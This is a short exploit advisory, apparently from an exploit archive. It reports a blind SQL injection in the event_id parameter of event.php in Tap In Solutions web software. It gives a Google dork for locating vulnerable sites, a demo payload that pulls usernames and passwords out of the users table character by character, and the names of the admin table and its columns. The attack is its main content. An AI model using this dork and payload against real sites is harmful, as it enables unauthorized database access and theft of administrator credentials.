Tap In Solutions suffers from a remote blind SQL injection vulnerability.
995cbf573228570625a2c32a2a15874c97fc116822256ce63a74c4f0f34843b3
==========================================================================
# Exploit Title: Tap In Solutions Blind SQL Injection Vulnerability
# Date: 17.10.2011
# Author: poach3r
# Software Link: http://www.tapinsolutionsinc.com/
# Tested on: Windows XP SP3
# Google Dork: inurl:event.php?event_id= powered by Tap In Solutions
==========================================================================
# Vulnerable File :
==> event.php <==
# Exploit :
http://127.0.0.1/path/event.php?event_id=[SQL]
# Demo :
http://127.0.0.1/path/event.php?event_id=1/**/and/**/(select/**/substring(concat(1,user_name,password),1,1)/**/from/**/users/**/limit/**/0,1)=1
# Details :
Admin Table : users
Username Column : user_name
Password Column : password
==========================================================================
# GreetZ To : All IRANIAN HackerZ
./End